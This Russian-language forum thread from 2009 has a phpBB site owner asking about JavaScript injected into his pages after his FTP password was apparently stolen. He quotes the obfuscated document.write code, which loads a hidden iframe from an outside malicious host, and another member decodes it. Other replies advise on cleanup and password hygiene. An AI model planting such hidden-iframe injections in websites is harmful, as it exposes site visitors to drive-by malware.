Вернуться   Дизайнерский форум » РАЗНОЕ » Кальянная

Вирус о_О

Обсуждение темы Вирус о_О в разделе Кальянная, часть категории РАЗНОЕ; Не знал, в какой раздел запихнуть, поэтому сунул сюда. Долгое время форум на PHPBB нормально работал. А вот вчера ПХП начал выдавать ошибки, ...


Закрытая тема
 
Опции темы
Старый 23.01.2009, 09:49   #1
Не знал, в какой раздел запихнуть, поэтому сунул сюда.

Долгое время форум на PHPBB нормально работал. А вот вчера ПХП начал выдавать ошибки, что не может установить хедеры, потому что они уже отправлены. И сразу начинает ругаться аваст:

сетевой экран: заблокировано соединение с вредоносным сайтом *URL вредоносного сайта*

Посмотрел код сгенерированной страницы, в начало откуда-то добавилось вот это:
Код HTML:
<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script><!-- c65 --><!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script><!-- c65 -->
Откуда это взялось - не понятно, для успокоения души порылся в исходниках PHPBB, и, естесственно, не нашел, где эта гадость выводится.

Из-за чего может быть такое?

На всякий случай не даю ссылку на форум и вредоносный сайт.
 
Старый 23.01.2009, 09:49
Ссылки
Старый 23.01.2009, 10:00   #2
Ну, кто-то добыл пароль к твоему FTP и встроил код вируса. Найди, куда оно встроено и удали.

Могу найти и исправить за 1000 рублей.
 
Старый 23.01.2009, 11:31   #3
А пишет он кстати это:
Код:
<iframe src="http://rtdmns.net/parus/?t=28" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
 
Старый 23.01.2009, 11:52   #4
Scroll, сколько раз говорить не хранить пароли в ФТП-клиентах...
 
Старый 23.01.2009, 13:14   #5
Да. Такое часто бывает.
 
Старый 23.01.2009, 15:59   #6
Ваш вирус не актуален: 404 Not Found
 
Старый 23.01.2009, 16:02   #7
У меня тоже такое было Но у меня только iframe прописал в индекс.php
1. убрал код айфрейма
2. Написал в свой хостинг
3. Написал в хостинг, хостящий сайт указанный в коде iframe, попросил разобраться. Там на меня положили - на этом все и закончилось )
 
Старый 26.01.2009, 11:01   #8
Цитата:
Сообщение от Silver Посмотреть сообщение
Scroll, сколько раз говорить не хранить пароли в ФТП-клиентах...
Дураки учатся на своих ошибках. Теперь буду более осторожен.

Последний раз редактировалось kost; 26.01.2009 в 14:00..
 
Старый 30.01.2009, 01:34   #9
Знакомая ситуация. Это ваш комп поймал троян, вот почитайте. Вредоносный код у вас, скорее всего во всех файлах index.php и index.html в самом низу перед тегом </html>, хотя может быть и внутри страницы, искать нужно.... Вычищайте код, меняйте пароли к фтп, ну и, конечно, вирус удаляйте. И, как сказано выше, не храните пароли в программах для фтп.
 
Старый 30.01.2009, 10:20   #10
Да, почистил комп, поменял пароль на FTP, перестал хранить его в ftp-клиенте. Код был прописан во всех index.*, main.*, login.*. На некоторых страницах по 2 раза (обязательно внизу, иногда примерно в середине).
 
Старый 30.01.2009, 10:20
Закрытая тема




Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вирус? ddddd Кальянная 40 28.05.2010 10:51
Вирус или нет? sokol666 Кальянная 19 31.12.2008 15:47
Вирус в сети.... candy_man Кальянная 7 04.02.2004 08:37


Текущее время: 08:46. Часовой пояс GMT +4.

Реклама на форуме Условия размещения рекламы
Биржа ссылок Заработай на сайте!
Дизайнерский форум